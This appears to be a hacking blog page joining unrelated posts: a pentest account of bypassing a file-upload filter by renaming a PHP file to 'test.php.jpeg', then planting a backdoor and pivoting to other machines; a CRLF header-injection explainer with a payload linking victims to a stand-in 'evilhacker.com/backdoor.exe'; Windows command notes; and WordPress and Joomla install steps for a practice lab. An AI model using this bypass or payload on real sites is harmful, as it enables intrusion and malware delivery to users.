The site moved to root domain where all post are imported. Please go to http://pusheax.com/
You are Expert!!!
You are Expert!!!
I did my job very quickly after found a File Uploading Vulnerability in a website. I was pentesting a network remotely (Blackbox testing) and it was really hard. I often browsed their website. Even I did not able to ping their IP because it was firewall . My only rest thing to be done was Social Engineering and Web pentesting (Really i was confused!!! If the SE and Web hacking method does not work then perhaps my heart about to attacked !!! lol(my heart is not weak)). Anyway, I scanned the site with various vulnerability scanner ,,,, no luck!!! So I started browsing the site manually(and Google searching randomly, Truthfully dunno what to find).
Suddenly I found a personal file upload link which was hell to find the link but my google friend helped me much. The link was like : www.hired-me.org/test/personal/re_al/file2010.php . It just accept 3 types of file extension JPEG, TEXT,CSV. First time i did not think that this link has any vulnerability(Already confused for the fucking scanner!!!).
How i exploited:
First i upload a jpeg file and try to find the location where it is saved. It was also hard(My knowledge is sucks?). OK, At least i found the jpeg file is located in the www.hired-me.com/index/hidden/director/test.jpeg , Everything Okay. Now i quickly create a php file[test.php] :
I quickly try to upload the “test.php” and “test.jpeg.php” but error “Unknown File Extension” . This error make me sure that the file extension is filtered.
Again i renamed the “test.php” to “test.php.jpeg” . Now no error!!! wow!!
I quickly check www.hired-me.com/index/hidden/director/test.php.jpeg and the page display “This is test“. Now i decide to upload a real php backdoor. Then upload some rooting tools then created ssh and then compromised two additional machine. Job is done!!!
Feedback are welcome!!!
If we can inject newline into the header we control , then we will be able to insert some additional HTTP Header and some nasty body text. I don’t think so that we can compromised a website/server via this vulnerability. But still it is power for Social Engineering attack, Phishing, Redirecting to malicious site, downloading backdoor, virtual defacement, sometime injecting cookie etc. It is much like XSS.
Basically this vulnerability found in “set-cookie” and “location” . If we connect to a website:
If this is behavior of the host then we should try to insert Carriage-return and Line-feed :
If the host is vulnerable then it will reply with a additional line “it-is=vulnerable” like this:
Simply a hacker can force the users to download a backdoor:
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way 😉
See the all directory in a specified path.
dir /aHD c:windowssystem32
for directroy or file.
xcopy e:somedirectory f:somewherecopy
We have installed wordpress which is really very very easy to install. Now i am going to show you to install JOOMLA . I think you are enough smart to understand that why we need joomla, wordpress or others things . Let’s start,
Download joomla from http://www.joomla.org/download.html
it is a zip file .Extract it same as WordPress i did.
We need to install apache2 php5-mysql libapache2-mod-php5 mysql-server
Some of them we already installed when installed the wordpress
So simply :
(NOTE: You need these things to understand the things )
You need to install MySql, Apache, PHP, php-gd
currently i am using Kubuntu. If you are also running Kubuntu or Ubuntu then run :
apt-get install mysql-server php5 php-gd php5-mysql
Specify your mysql password. Remember Defaultly it will mysql root password (Be aware!!!).
Please download the wordpress from their site(http://wordpress.org/latest.zip) with command wget -c http://wordpress.org/latest.zip.
Now we edit ,
we just need to edit some simple things:
/** MySQL database username */
/** MySQL database password */
GOOD !!! now you are ready to go …
Just visit : http://localhost/wordpress/wp-admin/install.php (OR IP) and you will see:
Simply fill up the forum and click on “install” button.
Good !! you just installed the wordpress :
click on “Log in” button for wordpress administration .
Now enjoy, practice the security in your own site.
Next we will install “Joomla“